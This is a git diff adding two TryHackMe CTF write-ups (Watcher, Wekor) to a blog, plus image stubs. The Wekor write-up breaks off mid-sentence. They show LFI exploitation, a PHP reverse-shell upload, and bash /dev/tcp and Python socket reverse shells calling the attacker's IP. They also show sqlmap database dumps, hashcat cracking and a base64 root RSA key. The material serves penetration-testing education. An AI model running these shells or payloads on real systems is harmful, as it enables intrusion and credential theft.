--- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:756776911e19502142abfe1b9428d7377b7be8100858cd480764160ee3cfb923 +size 28508 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-7.png b/content/writeup-ctf/writeup-watcher-thm/img/image-7.png new file mode 100644 index 0000000..6c0694d --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc87f824b7ac23ca4dca42b57fc70b25572be35933ef62df0d63d4f458e971d5 +size 19059 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp new file mode 100644 index 0000000..97dad08 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c492d33a4b529b85e97d8859e315bb5028690cdef7811ffd30497b8c59e1c922 +size 30040 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-8.png b/content/writeup-ctf/writeup-watcher-thm/img/image-8.png new file mode 100644 index 0000000..ebd7325 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88070f283adbfc40b764e58df824e7716476bdfba85a4aa413e403952d4b8200 +size 16042 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp new file mode 100644 index 0000000..e8c9a85 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6455518ff1592fcf4f6db8f61da431bc1e97bd0191d57a8dd9a005fc8a0a32d +size 18780 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-9.png b/content/writeup-ctf/writeup-watcher-thm/img/image-9.png new file mode 100644 index 0000000..4983344 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0243b3fc1cbcdf63f2449a7a1139151070b4e76aa903b6d65842e1332df0669 +size 17271 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp new file mode 100644 index 0000000..3b7e2da --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e04852f4309d777558bba6a0bb065688fb4ca612145724765eae4149b5acb10 +size 19338 diff --git a/content/writeup-ctf/writeup-watcher-thm/index.md b/content/writeup-ctf/writeup-watcher-thm/index.md new file mode 100644 index 0000000..547852f --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/index.md @@ -0,0 +1,341 @@ +--- +title: "Writeup - Watcher (THM)" +date: 2022-04-02 +slug: "writeup-watcher-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Watcher](https://tryhackme.com/room/watcher) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.91.35 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 21/tcp : FTP (vsftpd 3.0.3) +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.29) + +## Flag 1 - robots.txt + +At first I start by listing the pages of the website. + +![](img/image-2.webp) + +The `robots.txt` page catches my attention, so I go to it and find the following content: + + +```bash +User-agent: * +Allow: /flag_1.txt +Allow: /secret_file_do_not_read.txt +``` +So we learn the existence of 2 pages, the first is accessible and gives us the first flag : + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ curl http://10.10.91.35/flag_1.txt +FLAG{robots_dot_text_what_is_next} +``` +The second one is unfortunately not available at the moment. + +## Flag 2 - ftpuser + +After some research, I find that the page `post.php` has a `post` argument that allows to change the article. By trying a simple injection I can access the contents of a file that I know exists on the remote machine: + + +```bash +http://10.10.91.35/post.php?post=/etc/passwd +``` +![](img/image-3.webp) + +I will be able to see the content of the page previously found: + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ curl http://10.10.91.35/post.php?post=secret_file_do_not_read.txt +[...] + Hi Mat, + +The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files. + +Will + +---------- + +ftpuser:givemefiles777 +[...] +``` +We learn that the credentials of the FTP server are: `ftpuser:givemefiles777`. So I can connect and list the files: + +![](img/image-4.webp) + +I find the file of the second one, I download it and I display it: + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ cat flag_2.txt +FLAG{ftp_you_and_me} +``` +## Flag 3 - www-data + +In addition to the reading rights, the FTP access allows me to send files. So I create a PHP reverse shell, then I upload it on the server. + +![](img/image-5.webp) + +I launch the script by accessing the following URL: + + +```bash +10.10.91.35/post.php?post=/home/ftpuser/ftp/files/reverse.php +``` +![](img/image-6.webp) + +I now have a reverse shell, I look for the third flag with the following command: + + +```bash +$ find / -name flag_3.txt 2>/dev/null +/var/www/html/more_secrets_a9f10a/flag_3.txt +$ cat /var/www/html/more_secrets_a9f10a/flag_3.txt +FLAG{lfi_what_a_guy} +``` +## Flag 4 - toby + +Using the same command as above I find that the fourth flag is in the user `toby` folder. So I will have to find a way to change the user. + +![](img/image-7.webp) + +Looking at the sudo permissions I have with my current user, I find that I can run any command as `toby`. + + +```bash +$ sudo -l +Matching Defaults entries for www-data on watcher: + env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin + +User www-data may run the following commands on watcher: + (toby) NOPASSWD: ALL +``` +So I create a shell with the following command: + + +```bash +sudo -u toby /bin/sh +``` +I can now recover the fourth flag. + + +```bash +toby@watcher:/home$ cat toby/flag_4.txt +cat toby/flag_4.txt +FLAG{chad_lifestyle} +``` +## Flag 5 - mat + +After searching for the fifth flag I find that it is in the personal file of `mat`. + +But I also find 2 files in the personal folder of my current user: + + +```bash +$ cat toby/note.txt +Hi Toby, + +I've got the cron jobs set up now so don't worry about getting that done. + +Mat +$ cat toby/jobs/cow.sh +#!/bin/bash +cp /home/mat/cow.jpg /tmp/cow.jpg +``` +I then discover that the `cow.sh` script is executed every minute by the `mat` user. + + +```bash +toby@watcher:/home$ cat /etc/crontab +cat /etc/crontab +# /etc/crontab: system-wide crontab +[...] +*/1 * * * * mat /home/toby/jobs/cow.sh +``` +Knowing that I can modify the content of this script, I add a reverse shell to the file with the following command: + + +```bash +echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> toby/jobs/cow.sh +``` +I now have a reverse shell as a `mat`: + +![](img/image-8.webp) + +And I can get the fifth flag back: + + +```bash +mat@watcher:~$ cat flag_5.txt +cat flag_5.txt +FLAG{live_by_the_cow_die_by_the_cow} +``` +## Flag 6 - will + +After searching for the sixth flag I find that it is in `will` personnel file. + +But I also find 1 file in the personal folder of my current user: + + +```bash +mat@watcher:~$ cat note.txt +cat note.txt +Hi Mat, + +I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe. + +Will +``` +Looking at my sudo permissions, I discover that I can run the `will_scirpt.py` script as `will`. + +![](img/image-9.webp) + +By looking at the functioning of the script I discover that it is in two parts: + + +```bash +mat@watcher:~$ cat scripts/will_script.py +cat scripts/will_script.py +import os +import sys +from cmd import get_command + +cmd = get_command(sys.argv[1]) + +whitelist = ["ls -lah", "id", "cat /etc/passwd"] + +if cmd not in whitelist: + print("Invalid command!") + exit() + +os.system(cmd) + +------------------------------------------ + +mat@watcher:~$ cat scripts/cmd.py +cat scripts/cmd.py +def get_command(num): + if(num == "1"): + return "ls -lah" + if(num == "2"): + return "id" + if(num == "3"): + return "cat /etc/passwd" +``` +And interestingly the second part of the script is editable by my user: + + +```bash +mat@watcher:~$ ls -la scripts +ls -la scripts +total 16 +drwxrwxr-x 2 will will 4096 Dec 3 2020 . +drwxr-xr-x 6 mat mat 4096 Dec 3 2020 .. +-rw-r--r-- 1 mat mat 133 Dec 3 2020 cmd.py +-rw-r--r-- 1 will will 208 Dec 3 2020 will_script.py +``` +So I add a python reverse shell at the beginning of the file. + + +```bash +echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.3.186",3456));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") + +def get_command(num): + if(num == "1"): + return "ls -lah" + if(num == "2"): + return "id" + if(num == "3"): + return "cat /etc/passwd"' > scripts/cmd.py +``` +Then I run the script with the following command: + + +```bash +sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1 +``` +I now have a reverse shell as a `will`. + +![](img/image-10.webp) + +And I can get the sixth flag back. + + +```bash +will@watcher:/home/will$ cat flag_6.txt +cat flag_6.txt +FLAG{but_i_thought_my_script_was_secure} +``` +## Flag 7 - root + +When I try to find the seventh flag with the same method as for the previous ones, I can't find anything... It must be the root flag! + +I first use [linPeas](https://linpeas.sh) to try to find a way to do an elevation of privilege. After a few minutes of analysis of the result of the command. I find a strange file belonging to the root user but readable by my user : + +![](img/image-11.webp) + +I retrieve its contents and then decrypt it with the `base64` command. + + +```bash +will@watcher:/home/will$ cat /opt/backups/key.b64 +cat /opt/backups/key.b64 +LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx +OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh +WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45 +ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu +TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ +T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw +bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR +QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3 +YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H +VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR +cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5 +cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3 +c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS +QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO +dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI +UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2 +TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB +QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ +TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj +dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz +K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu +U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw +NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2 +TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD +WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0 +bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4 +NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG +bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4 +STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t +LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo= +``` +This is an `id_rsa`! Certainly the one of the root user. So I add the permissions to the file, then I launch an SSH session: + +![](img/image-12.webp) + +I now have a `root` reserse shell and I can recover the last flag. + + +```bash +root@watcher:~# cat flag_7.txt +FLAG{who_watches_the_watchers} +``` diff --git a/content/writeup-ctf/writeup-wekor-thm/featured.png b/content/writeup-ctf/writeup-wekor-thm/featured.png new file mode 100644 index 0000000..51dbe5c --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5df83f38579999ce37f4c9c8a07349c6035af98a69df888e5a3715dd3d4a5f9 +size 184087 diff --git a/content/writeup-ctf/writeup-wekor-thm/featured.webp b/content/writeup-ctf/writeup-wekor-thm/featured.webp new file mode 100644 index 0000000..e395d1c --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c52d60524837f1484f9e0812f7426813ebab23341876b4af47b5f32db24e9884 +size 112458 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-1.png b/content/writeup-ctf/writeup-wekor-thm/img/image-1.png new file mode 100644 index 0000000..9ea947d --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14afe59a7e5bf8fbf46e7486f676ab17dcd8da8110962ad5ce38ee3c1e83de90 +size 28343 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp new file mode 100644 index 0000000..665379d --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5acc27aea2c913c17f8c3d3c849e50275f46f8001fd5b862e9457a560c8092b5 +size 24082 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-10.png b/content/writeup-ctf/writeup-wekor-thm/img/image-10.png new file mode 100644 index 0000000..152b118 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:164ba22dc9832e403c424b153975946873d3ac0bc6fafe56bb3341a3b88e504e +size 19825 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp new file mode 100644 index 0000000..0c8b308 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9e84d213b03026626077fb1117bb7c6b7d3bb80bac7aa029be299f2fad77eb0 +size 17514 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-11.png b/content/writeup-ctf/writeup-wekor-thm/img/image-11.png new file mode 100644 index 0000000..74f43ad --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c4cd49f8324492627b7c6d200df3d1ec12f74f7fe800fe870d23604856d7bddf +size 18533 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp new file mode 100644 index 0000000..c2c72f2 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f08c26ba6f6cadfb75ce95d38ba1015f6c696571db38d4337319f87010187a43 +size 24508 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-12.png b/content/writeup-ctf/writeup-wekor-thm/img/image-12.png new file mode 100644 index 0000000..1a32652 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4874bf2ffe81e7c122c84fb2813d198e4b4f332b4381b8eb00b750a7add0539e +size 33414 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp new file mode 100644 index 0000000..dc189b7 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfd747ca9e69019d494bb79b3a5671eb3284ccf0ab943e616874b85ac4a5c0fb +size 41824 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-2.png b/content/writeup-ctf/writeup-wekor-thm/img/image-2.png new file mode 100644 index 0000000..ce7f6b5 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7337fdce830c8f06000d3731f67e3eadbd52d88b4e4e81a13b1b6eb879682986 +size 57670 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp new file mode 100644 index 0000000..8cea94b --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3eda63a441ea7236a24d3bb845e9d3823839aed34c589ec5019c6e64e3e87c5c +size 51028 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-3.png b/content/writeup-ctf/writeup-wekor-thm/img/image-3.png new file mode 100644 index 0000000..761d496 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbb086665dd2e3812d33c8a6c217d24958be110257fb60f7285d18f27bd197d4 +size 653719 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp new file mode 100644 index 0000000..5a05fcf --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d2e50f29e4cf4e154208060b055b19acceb45552ed2af2b7963c23bffb912d7 +size 82778 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-4.png b/content/writeup-ctf/writeup-wekor-thm/img/image-4.png new file mode 100644 index 0000000..97bada3 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a29b17a6a8dc413211bdef298c231f4974ef66e950a40304808ba23623639f5 +size 45596 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp new file mode 100644 index 0000000..0e3c984 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec61996217d9dc59d7d8f48f20f919ff59b28ece44e7798626b455b860c468a0 +size 42818 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-5.png b/content/writeup-ctf/writeup-wekor-thm/img/image-5.png new file mode 100644 index 0000000..8ba2e63 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab43a2a38df07938b6c2c26a909e819b367a15dcd7254011e284c8e48525b587 +size 58688 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp new file mode 100644 index 0000000..a65300e --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e8fca1016793473db9361d5957499b0307ca3d9a76c571e5022fb9622e40abe +size 50654 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-6.png b/content/writeup-ctf/writeup-wekor-thm/img/image-6.png new file mode 100644 index 0000000..a06daa3 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7413101302c8913152020b1fc4a993db5376e89586c5235d4ea538438df68c8 +size 74642 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp new file mode 100644 index 0000000..2df6c0f --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d79287646c6a0cc319771a0e0eaaa2819fbdbdb948490651892c09cbd8b29236 +size 23740 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-7.png b/content/writeup-ctf/writeup-wekor-thm/img/image-7.png new file mode 100644 index 0000000..efa8946 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d82afec852cff1072ec7c5a528b3e8aeb5b61ec20b7538ef977815d45ed7d364 +size 32316 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp new file mode 100644 index 0000000..847226c --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a785699e05e28983378ccfb07bade2ca8e6ebb48f2b2ac07a8a23d699fe5b755 +size 28508 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-8.png b/content/writeup-ctf/writeup-wekor-thm/img/image-8.png new file mode 100644 index 0000000..fd98c13 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96d865df6cbcfef9b8f7ad439243658a33494954e65414e2c2d98cf792f094ad +size 15869 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp new file mode 100644 index 0000000..3f9ea49 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5279b851a4e2e4fad5603234fca9ca181a1b3e19bf890e4ea44703549c44c85 +size 30930 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-9.png b/content/writeup-ctf/writeup-wekor-thm/img/image-9.png new file mode 100644 index 0000000..32c71a4 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f92eb4fb8f5a7f3240b3a00c0b9a209bbfe123476f4f60f8f17c30c73b6b056e +size 27551 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp new file mode 100644 index 0000000..60f0874 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1d4cfce647740116837196988e1605b8cb99c6e09c0a615f9e081b38e2c17ac +size 31926 diff --git a/content/writeup-ctf/writeup-wekor-thm/index.md b/content/writeup-ctf/writeup-wekor-thm/index.md new file mode 100644 index 0000000..cf2783e --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/index.md @@ -0,0 +1,220 @@ +--- +title: "Writeup - Wekor (THM)" +date: 2022-04-17 +slug: "writeup-wekor-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Wekor](https://tryhackme.com/room/wekorra) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +## Exploit + +At first I start by listing the pages of the website. + +![](img/image-2.webp) + +I find a `robots.txt` file in which the following pages are listed: + + +```bash +User-agent: * +Disallow: /workshop/ +Disallow: /root/ +Disallow: /lol/ +Disallow: /agent/ +Disallow: /feed +Disallow: /crawler +Disallow: /boot +Disallow: /comingreallysoon +Disallow: /interesting +``` +While exploring I come across the following message: + + +```bash +Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot ! +``` +So there is a site hosted in the `it-next` next folder: + +![](img/image-3.webp) + +After some research I find an `Applie coupon` field on the `it_cart.php` page. I get a query using burp, then I run `sqlmap` to extract the database list. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ sqlmap -r request.txt --dbs --batch + ___ + __H__ + ___ ___[(]_____ ___ ___ {1.6.4#stable} +|_ -| . ['] | .'| . | +|___|_ [)]_|_|_|__,| _| + |_|V... |_| https://sqlmap.org + +[...] +web application technology: Apache 2.4.18 +back-end DBMS: MySQL >= 5.6 +[16:07:49] [INFO] fetching database names +available databases [6]: +[*] coupons +[*] information_schema +[*] mysql +[*] performance_schema +[*] sys +[*] wordpress + +[16:07:49] [INFO] fetched data logged to text files under '/home/d3vyce/.local/share/sqlmap/output/wekor.thm' + +[*] ending @ 16:07:49 /2022-04-13/ +``` +I find a `wordpress` database, I will try to extract it with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ sqlmap -r request.txt -D wordpress --dump --batch +[...] +[4 entries] ++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ +| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key | ++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ +| 1 | http://site.wekor.thm/wordpress | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B. | admin@wekor.thm | admin | 0 | admin | admin | 2021-01-21 20:33:37 | | +| 5743 | http://jeffrey.com | $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10 | jeffrey@wekor.thm | wp_jeffrey | 0 | wp jeffrey | wp_jeffrey | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 | +| 5773 | http://yura.com | $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/ | yura@wekor.thm | wp_yura | 0 | wp yura | wp_yura | 2021-01-21 20:35:27 | | +| 5873 | http://eagle.com | $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/ (xxxxxx) | eagle@wekor.thm | wp_eagle | 0 | wp eagle | wp_eagle | 2021-01-21 20:36:11 | | ++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ +[...] +``` +In the interval I find 4 user/password pairs. I put them in a file and I run `hashcat`. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ hashcat -m 400 hash wordlist/rockyou.txt +[...] +$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/:xxxxxx (eagle) +$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10:rockyou (jeffrey) +$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/:soccer13 (yura) +[...] +``` +After a few seconds, we find all the passwords except the one of Admin. Now that we have credentials, we need to find the wordpress site; I launch a subdomain scan. + +![](img/image-4.webp) + +I find the `site` subdomain, I add it to the `/etc/hosts`, then I go to the site. On this page, I find the following text: + + +```bash +Hi there! +Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T 